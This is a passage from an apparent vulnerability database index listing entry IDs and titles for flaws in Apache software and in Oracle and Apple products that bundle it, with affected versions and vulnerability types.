2011| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
2012| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
2013| [112114] Oracle 9.1 Apache Log4j privilege escalation
2014| [112113] Oracle 9.1 Apache Log4j privilege escalation
2015| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
2016| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
2017| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
2018| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
2019| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
2020| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
2021| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
2022| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
2023| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
2024| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
2025| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
2026| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
2027| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
2028| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
2029| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
2030| [110701] Apache Fineract Query Parameter sql injection
2031| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
2032| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
2033| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
2034| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
2035| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
2036| [110106] Apache CXF Fediz Spring cross site request forgery
2037| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
2038| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
2039| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
2040| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
2041| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
2042| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
2043| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
2044| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
2045| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
2046| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
2047| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
2048| [108938] Apple macOS up to 10.13.1 apache denial of service
2049| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
2050| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
2051| [108935] Apple macOS up to 10.13.1 apache denial of service
2052| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
2053| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
2054| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
2055| [108931] Apple macOS up to 10.13.1 apache denial of service
2056| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
2057| [108929] Apple macOS up to 10.13.1 apache denial of service
2058| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
2059| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
2060| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
2061| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
2062| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
2063| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
2064| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
2065| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
2066| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
2067| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
2068| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
2069| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
2070| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
2071| [108782] Apache Xerces2 XML Service denial of service
2072| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
2073| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
2074| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
2075| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
2076| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
2077| [108629] Apache OFBiz up to 10.04.01 privilege escalation
2078| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
2079| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
2080| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
2081| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
2082| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
2083| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
2084| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
2085| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
2086| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
2087| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
2088| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
2089| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
2090| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
2091| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
2092| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
2093| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
2094| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
2095| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
2096| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
2097| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
2098| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
2099| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
2100| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
2101| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
2102| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
2103| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
2104| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
2105| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
2106| [107639] Apache NiFi 1.4.0 XML External Entity
2107| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
2108| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
2109| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
2110| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
2111| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
2112| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
2113| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
2114| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
2115| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
2116| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
2117| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
2118| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
2119| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
2120| [107197] Apache Xerces Jelly Parser XML File XML External Entity
2121| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
2122| [107084] Apache Struts up to 2.3.19 cross site scripting
2123| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
2124| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
2125| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
2126| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
2127| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
2128| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
2129| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
2130| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
2131| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
2132| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
2133| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
2134| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
2135| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
2136| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
2137| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
2138| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
2139| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
2140| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
2141| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
2142| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
2143| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
2144| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
2145| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
2146| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
2147| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
2148| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
2149| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
2150| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
2151| [105878] Apache Struts up to 2.3.24.0 privilege escalation
2152| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
2153| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
2154| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
2155| [105643] Apache Pony Mail up to 0.8b weak authentication
2156| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
2157| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
2158| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
2159| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
2160| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
2161| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
2162| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
2163| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
2164| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
2165| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
2166| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
2167| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
2168| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
2169| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
2170| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
2171| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
2172| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
2173| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
2174| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
2175| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
2176| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
2177| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
2178| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
2179| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
2180| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
2181| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
2182| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
2183| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
2184| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
2185| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
2186| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
2187| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
2188| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
2189| [103690] Apache OpenMeetings 1.0.0 sql injection
2190| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
2191| [103688] Apache OpenMeetings 1.0.0 weak encryption
2192| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
2193| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
2194| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
2195| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
2196| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
2197| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
2198| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
2199| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
2200| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
2201| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
2202| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
2203| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
2204| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
2205| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
2206| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
2207| [103352] Apache Solr Node weak authentication
2208| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
2209| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
2210| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
2211| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
2212| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
2213| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
2214| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
2215| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
2216| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
2217| [102536] Apache Ranger up to 0.6 Stored cross site scripting
2218| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
2219| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
2220| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
2221| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
2222| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
2223| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
2224| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
2225| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
2226| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
2227| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
2228| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
2229| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
2230| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
2231| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
2232| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
2233| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
2234| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
2235| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
2236| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
2237| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
2238| [99937] Apache Batik up to 1.8 privilege escalation
2239| [99936] Apache FOP up to 2.1 privilege escalation
2240| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
2241| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
2242| [99930] Apache Traffic Server up to 6.2.0 denial of service
2243| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
2244| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
2245| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
2246| [117569] Apache Hadoop up to 2.7.3 privilege escalation
2247| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
2248| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
2249| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
2250| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
2251| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
2252| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
2253| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
2254| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
2255| [99014] Apache Camel Jackson/JacksonXML privilege escalation
2256| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
2257| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
2258| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
2259| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
2260| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
2261| [98605] Apple macOS up to 10.12.3 Apache denial of service
2262| [98604] Apple macOS up to 10.12.3 Apache denial of service
2263| [98603] Apple macOS up to 10.12.3 Apache denial of service
2264| [98602] Apple macOS up to 10.12.3 Apache denial of service
2265| [98601] Apple macOS up to 10.12.3 Apache denial of service
2266| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
2267| [98405] Apache Hadoop up to 0.23.10 privilege escalation
2268| [98199] Apache Camel Validation XML External Entity
2269| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
2270| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
2271| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
2272| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
2273| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
2274| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
2275| [97081] Apache Tomcat HTTPS Request denial of service
2276| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
2277| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
2278| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
2279| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
2280| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
2281| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
2282| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
2283| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
2284| [95311] Apache Storm UI Daemon privilege escalation
2285| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
2286| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
2287| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
2288| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
2289| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
2290| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
2291| [94540] Apache Tika 1.9 tika-server File information disclosure
2292| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
2293| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
2294| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
2295| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
2296| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
2297| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
2298| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
2299| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
2300| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
2301| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
2302| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
2303| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
2304| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
2305| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
2306| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
2307| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
2308| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
2309| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
2310| [93532] Apache Commons Collections Library Java privilege escalation
2311| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
2312| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
2313| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
2314| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
2315| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
2316| [93098] Apache Commons FileUpload privilege escalation
2317| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
2318| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
2319| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
2320| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
2321| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
2322| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
2323| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
2324| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
2325| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
2326| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
2327| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
2328| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
2329| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
2330| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
2331| [92549] Apache Tomcat on Red Hat privilege escalation
2332| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
2333| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
2334| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
2335| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
2336| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
2337| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
2338| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
2339| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
2340| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
2341| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
2342| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
2343| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
2344| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
2345| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
2346| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
2347| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
2348| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
2349| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
2350| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
2351| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
2352| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
2353| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
2354| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
2355| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
2356| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
2357| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
2358| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
2359| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
2360| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
2361| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
2362| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
2363| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
